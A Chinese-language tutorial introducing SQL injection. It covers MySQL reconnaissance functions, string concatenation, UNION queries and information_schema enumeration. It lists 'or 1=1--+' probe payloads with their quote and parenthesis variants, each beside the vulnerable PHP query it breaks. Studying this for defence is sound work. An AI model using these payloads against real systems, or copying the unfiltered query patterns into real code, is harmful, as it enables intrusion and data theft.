Web攻防：SQL注入 - 前置知识

SQL注入- 前置知识

• • 1. 注入原理
  • • 1.1. 什么是SQL注入
    • 1.2. SQL注入产生的条件
  • 2. 系统函数
  • • 2.1. version() - MySQL 版本
    • 2.2. user() - 数据库用户名
    • 2.3. database() - 数据库名
    • 2.4. @@datadir - 数据库路径
    • 2.5. @@version_compile_os - 操作系统版本
  • 3. 字符串连接函数
  • • 3.1. CONCAT(s1,s2...sn)
    • 3.2. CONCAT_WS(x, s1,s2...sn)
    • 3.3. GROUP_CONCAT(s1,s2...sn)
  • 4. 一般尝试语句
  • • 4.1. or 1=1--+
    • 4.2. 'or 1=1--+
    • 4.3. "or 1=1--+
    • 4.4. )or 1=1--+
    • 4.5. ')or 1=1--+
    • 4.6. ") or 1=1--+
    • 4.7. "))or 1=1--+
  • 5. UNION 操作符
  • • 5.1. 描述：
    • 5.2. 语法：
    • 实例：
  • 6. MySQL 5.x+ 特性
  • • 6.1. 数据库
    • 6.2. 表
    • 6.3 字段

1. 注入原理

1.1. 什么是SQL注入

• SQL 注入就是指 Web 应用程序对用户输入的数据合法性没有过滤或者是判断，攻击者可以在Web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句，在管理员不知情的情况下实现非法操作，以此来实现欺骗数据库服务器执行非授权的任意查询，从而进一步得到相应的数据信息。

1.2. SQL注入产生的条件

• 传递给后端的参数是可以控制的
• 参数内容会被带入到数据库查询
• 变量未存在过滤或者过滤不严谨

2. 系统函数

2.1. version() - MySQL 版本

2.2. user() - 数据库用户名

2.3. database() - 数据库名

2.4. @@datadir - 数据库路径

2.5. @@version_compile_os - 操作系统版本

3. 字符串连接函数

3.1. CONCAT(s1,s2…sn)

• 字符串 s1,s2 等多个字符串合并为一个字符串

  SELECT CONCAT("SQL ", "Runoob ", "Gooogle ", "Facebook");
  

  

3.2. CONCAT_WS(x, s1,s2…sn)

• 同 CONCAT(s1,s2,…) 函数，但是每个字符串之间要加上 x，x 可以是分隔符

  SELECT CONCAT_WS("-", "SQL", "Tutorial", "is", "fun!");
  

  

3.3. GROUP_CONCAT(s1,s2…sn)

• 是将分组中括号里对应的字符串进行连接.如果分组中括号里的参数xxx有多行，那么就会将这多行的字符串连接，每个字符串之间会有特定的符号进行分隔。

  SELECT GROUP_CONCAT(username) FROM users;
  

  

4. 一般尝试语句

• Ps：–+可以用#替换，url 提交过程中 Url 编码后的#为%23

4.1. or 1=1–+

适用于代码为：

$id=$_GET['id'];
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";

4.2. 'or 1=1–+

适用于代码为：

$id=$_GET['id'];
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

4.3. "or 1=1–+

适用于代码为：

$id=$_GET['id'];
$sql="SELECT * FROM users WHERE id=\"$id\" LIMIT 0,1";

4.4. )or 1=1–+

适用于代码为：

$id=$_GET['id'];
$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";

4.5. ')or 1=1–+

适用于代码为：

$id=$_GET['id'];
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";

4.6. ") or 1=1–+

适用于代码为：

$id=$_GET['id'];
$sql="SELECT * FROM users WHERE id=(\"$id\") LIMIT 0,1";

4.7. "))or 1=1–+

适用于代码为：

$id=$_GET['id'];
$sql="SELECT * FROM users WHERE id=((\"$id\")) LIMIT 0,1";

5. UNION 操作符

5.1. 描述：

• UNION 操作符必须由两个或多个 SELECT 语句组成，每个 SELECT 语句的列数和对应位置的数据类型必须相同。

5.2. 语法：

MySQL UNION 操作符语法格式：

SELECT column1, column2, ... FROM table1
UNION
SELECT column1, column2, ... FROM table2

• UNION 操作符用于连接两个以上的 SELECT 语句的结果组合到一个结果集合，并去除重复的行。

SELECT column1, column2, ... FROM table1
UNION ALL
SELECT column1, column2, ... FROM table2

• UNION ALL 操作符用于连接两个以上的 SELECT 语句的结果组合到一个结果集合，保留重复的行。

实例：

• UNION 结果集中的列名总是等于 UNION 中第一个 SELECT 语句中的列名。

  SELECT * FROM users WHERE id=1
  UNION
  SELECT 1, 2, 3
  

  

• 当 UNION 中第一个 SELECT 语句没数据时，第二个 SELECT 语句依旧查询。

  SELECT * FROM users WHERE id=1 AND 1=2
  UNION
  SELECT 1, 2, 3
  

  

6. MySQL 5.x+ 特性

• Mysql 5.x 往后的 有一个系统数据库 information_schema，存储着所有的数据库的相关信息

6.1. 数据库

• information_schema 的 SCHEMATA 表，存储着所有的数据库信息，SCHEMATA_NAME 字段存储所有库名。

  select SCHEMA_NAME from information_schema.SCHEMATA;
  

  

6.2. 表

• information_schema 的 TABLES 表，存储着所有的数据库信息，TABLE_NAME 字段存储所有表名，TABLE_SCHEMA 字段存储表对应的库。

  select TABLE_SCHEMA, TABLE_NAME from information_schema.TABLES;
  

  

6.3 字段

• information_schema 的 COLUMNS 表，存储着所有的数据库信息，COLUMN_NAME 字段存储所有字段名，TABLE_NAME 字段存储字段对应的表，TABLE_SCHEMA 字段存储字段对应的库。

  select TABLE_SCHEMA, TABLE_NAME, COLUMN_NAME from information_schema.COLUMNS;